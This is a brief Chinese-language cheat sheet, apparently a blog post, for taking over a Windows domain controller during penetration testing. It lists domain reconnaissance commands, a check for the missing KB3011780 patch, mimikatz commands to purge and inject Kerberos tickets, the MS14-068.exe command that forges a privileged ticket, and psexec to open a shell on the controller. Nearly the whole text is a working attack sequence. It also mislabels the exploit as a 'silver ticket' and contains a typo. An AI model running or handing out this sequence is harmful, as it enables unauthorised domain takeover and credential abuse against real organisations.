关于域渗透白银票据MS14068一些常用命令

关于域渗透白银票据MS14068一些常用命令

渗透测试过程中，拿域控是常见的，也可能有的服务器没有域控

常用命令如下：

关于

排查端口

53，3389端口

net time /domain 请求当前时间

ipconfig /all配置文件
nltest /DCLIST:test.com   多域控
net group "Domain Controllers" /domain
net group "domain admins" /domain 管理员
net hroup /domain 组

MS14068白银票据

排查补丁：systeminfo | find KB3011780

先使用mimikatz清除票据

kerberos::list
kerberos::purge
kerberos::list

whoami/all

利用格式

生成票据

MS14-068.exe -u <userName>@<domainName> -p <clearPassword> -s <userSid> -d <domainControlerAddr>

kerberos::purge
kerberos::list
kerberos::ptc

dir \\win2008.com\c$

psExec.exe \\win2008.com\ cmd.exe\ 提升权限
whoami

dir \\win2008.com\c$